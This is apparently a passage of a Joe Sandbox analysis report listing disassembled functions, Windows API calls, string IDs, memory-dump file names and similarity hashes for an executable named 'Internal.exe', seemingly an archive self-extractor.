                                      • _free.LIBCMT ref: 0051C83B
                                      • _free.LIBCMT ref: 0051C84D
                                      • _free.LIBCMT ref: 0051C85F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free$FreeHeap
                                      • String ID:
                                      • API String ID: 2929853658-0
                                      • Opcode ID: 3690f7740f8d75714c8ab2c2893f2012e6ae862f0d47f1391d022da8fd08d360
                                      • Instruction ID: d2aa25fcaaf59151ae5bcb3d76c765ea6e54fd02fd9499ec58f87ab9aa69deb2
                                      • Opcode Fuzzy Hash: 3690f7740f8d75714c8ab2c2893f2012e6ae862f0d47f1391d022da8fd08d360
                                      • Instruction Fuzzy Hash: 35F01432540211ABA630AA68F8CACAA7FEDBF50B107650C19F108D7652CB71FCC0CA60
                                      Function 00518900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0051891E
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 00518930
                                      • _free.LIBCMT ref: 00518943
                                      • _free.LIBCMT ref: 00518954
                                      • _free.LIBCMT ref: 00518965
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free$FreeHeap
                                      • String ID:
                                      • API String ID: 2929853658-0
                                      • Opcode ID: cfa6a74f49f0491231ac121bb51585f539c9880aad39986d5e4179ca6e776402
                                      • Instruction ID: ac0be85d48b61785ffa37c8b10d6f8a00b80a4123d2f011639e57a3a306b49aa
                                      • Opcode Fuzzy Hash: cfa6a74f49f0491231ac121bb51585f539c9880aad39986d5e4179ca6e776402
                                      • Instruction Fuzzy Hash: F5F082798103338BDA266F14FC564A53FB5FB37722B41090AF014562B1CF35498AFB81
                                      Function 005015FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _swprintf
                                      • String ID: %ls$%s: %s
                                      • API String ID: 589789837-2259941744
                                      • Opcode ID: 9af494793ab3f72a3cffa8800f1cc08eb0e1a3709978127395faf0ba902bd72f
                                      • Instruction ID: 89aadf003eec336cd2eaa2fe8cca42acfba269f6def2f3904205cbef9cc7af54
                                      • Opcode Fuzzy Hash: 9af494793ab3f72a3cffa8800f1cc08eb0e1a3709978127395faf0ba902bd72f
                                      • Instruction Fuzzy Hash: AB51C735288F04F6F7211A908E46F3E7E65BF15B04F248D06F387648E2D9A7A5506B1F
                                      Function 004FBB03 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: UNC$\\?\
                                      • API String ID: 176396367-253988292
                                      • Opcode ID: bb167736f21b3a910b080f64a0dcc6d68dfda2f733245e3285aadaae7d75fec4
                                      • Instruction ID: de88bf5762d98e82eb7d5e39e27a8b47cb126466f08cec19e97feb5eb7f54110
                                      • Opcode Fuzzy Hash: bb167736f21b3a910b080f64a0dcc6d68dfda2f733245e3285aadaae7d75fec4
                                      • Instruction Fuzzy Hash: 3241A33150025EA6DB21AF20CC05EFF7B69FF43394F10446BFA54A3291DB78DA918AE4
                                      Function 00517F6E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: (!U$C:\Users\user\Desktop\Internal.exe
                                      • API String ID: 269201875-2044512306
                                      • Opcode ID: 5cb28e8f637691f6513551f003fe9f64adc9f3b3ecf0af8d4e7384859ca34954
                                      • Instruction ID: ab98caafe361c1f6b122cbbc1ad85b1cd8a27725cf76b1eead91f036f95eba0a
                                      • Opcode Fuzzy Hash: 5cb28e8f637691f6513551f003fe9f64adc9f3b3ecf0af8d4e7384859ca34954
                                      • Instruction Fuzzy Hash: E6318071A0021DAFEB21DF99D888DEEBFB8FB99310F104066F80497211DB718A89DB51
                                      Function 0050AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • EndDialog.USER32(?,00000001), ref: 0050AD98
                                      • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0050ADAD
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 0050ADC2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 445417207-3402441367
                                      • Opcode ID: 86bc42f2734a97de09048f268bcfa0e1b3ca28c0bfd5340c96d09e7fb569fa78
                                      • Instruction ID: d661e9c7549c0630fbc2aa77c456fea1f70b1f3a2b8de69df909d09593007dd7
                                      • Opcode Fuzzy Hash: 86bc42f2734a97de09048f268bcfa0e1b3ca28c0bfd5340c96d09e7fb569fa78
                                      • Instruction Fuzzy Hash: 8211BE33240710AFE3118F68AD49FAE3F69FB5A743F400411F241EA4F0C7629D09A72A
                                      Function 0050DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • DialogBoxParamW.USER32(GETPASSWORD1,00010400,0050B270,?,?), ref: 0050DE18
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: DialogParam
                                      • String ID: GETPASSWORD1$rP$xzT
                                      • API String ID: 665744214-3788108970
                                      • Opcode ID: 6ff20a9005197314403c4562188b5e6d4f361c6c0aa4a4fdc456f6e62545fb11
                                      • Instruction ID: a627da64993afd1b4e3043224b819cb1130881858be59ba2c8a1c2ffece0e2cf
                                      • Opcode Fuzzy Hash: 6ff20a9005197314403c4562188b5e6d4f361c6c0aa4a4fdc456f6e62545fb11
                                      • Instruction Fuzzy Hash: 92113832600248AADF119A34EC05BBF3FA8BB1A355F144465BD49EB1C0C7B4AC88D374
                                      Function 004FD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: __fprintf_l_strncpy
                                      • String ID: $%s$@%s
                                      • API String ID: 1857242416-834177443
                                      • Opcode ID: 7a39a2fa5daa9a24aa8965a97c86974a3c13ed9cbadce85c751d43fe859d07de
                                      • Instruction ID: 2184c4296db374c82f51f59f3d6e61c3a92dbc3dfe08b9227d06edcd99901681
                                      • Opcode Fuzzy Hash: 7a39a2fa5daa9a24aa8965a97c86974a3c13ed9cbadce85c751d43fe859d07de
                                      • Instruction Fuzzy Hash: 7921967284024CAADB21DFA4CC05FEF7BE9AF06704F044423FA1096192E376D645CB56
                                      Function 004F124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Malloc
                                      • String ID: (P$2P$A
                                      • API String ID: 2696272793-1576226603
                                      • Opcode ID: 72799dc2782d0453f21b47c818585bacd0c6b7984c38c21834b82fbf293b1ae5
                                      • Instruction ID: 498d18c8c165f24399b58d3c63fe1fd3a005347172b25e573e3f634ba440a392
                                      • Opcode Fuzzy Hash: 72799dc2782d0453f21b47c818585bacd0c6b7984c38c21834b82fbf293b1ae5
                                      • Instruction Fuzzy Hash: 8C011B75901219ABCB14CFA4D8589EFBBF8AF09350B10415AE909E3350D7349A45DF94
                                      Function 0050DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: 0dac316960ffff39cf7977639d030a7b21e1c1c4075438ac20ce8a0f8a184dfb
                                      • Instruction ID: d22fe1a2429d6fb5d2f13fac3c0573ae1fc5ccf9ad07c6a3608a640dfdd337c9
                                      • Opcode Fuzzy Hash: 0dac316960ffff39cf7977639d030a7b21e1c1c4075438ac20ce8a0f8a184dfb
                                      • Instruction Fuzzy Hash: 11015E7A604345AFDB158FA4FC48AAA7FB8F769398B040425F805827B0C6719858FBB0
                                      Function 004F1316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004FE2E8: _swprintf.LIBCMT ref: 004FE30E
                                        • Part of subcall function 004FE2E8: _strlen.LIBCMT ref: 004FE32F
                                        • Part of subcall function 004FE2E8: SetDlgItemTextW.USER32(?,0052E274,?), ref: 004FE38F
                                        • Part of subcall function 004FE2E8: GetWindowRect.USER32(?,?), ref: 004FE3C9
                                        • Part of subcall function 004FE2E8: GetClientRect.USER32(?,?), ref: 004FE3D5
                                      • GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                      • SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: P$0
                                      • API String ID: 2622349952-403496799
                                      • Opcode ID: f7f7f95873ba347bfce1b635708c612a398a0c8c626f708580e44d7dbd217b21
                                      • Instruction ID: ada5cb5f9081a73349e3bfb78372894d522bf322bcd945b1623ceb6b03ebbe1a
                                      • Opcode Fuzzy Hash: f7f7f95873ba347bfce1b635708c612a398a0c8c626f708580e44d7dbd217b21
                                      • Instruction Fuzzy Hash: E3F08C3110438CEAEF150F61880DABA3F98AF103A5F04851AFE8850AB1DB7CC994EE18
                                      Function 00519A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: cf5ed7a10036d310a9347dfdacf332198bc42a51338ac969b190de77dd256315
                                      • Instruction ID: 72b13155d56a4b62c13fe5a05cbf6fb3e97f1b32be50bed649682f0644106a8d
                                      • Opcode Fuzzy Hash: cf5ed7a10036d310a9347dfdacf332198bc42a51338ac969b190de77dd256315
                                      • Instruction Fuzzy Hash: FDA135769042869FFB218E28C8A17EEBFE5FF51314F28456DE4859B281C2389DC1C791
                                      Function 0050FD10 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _com_issue_error
                                      • String ID:
                                      • API String ID: 2162355165-0
                                      • Opcode ID: cd17ec3cf0a7e9d054715132d3d55c0661762c3d066516e7ddbd2919f6711aad
                                      • Instruction ID: d8b749e0432092c3e51afa8768f37c4c8ee2a575866312d9e1b606f78102ee53
                                      • Opcode Fuzzy Hash: cd17ec3cf0a7e9d054715132d3d55c0661762c3d066516e7ddbd2919f6711aad
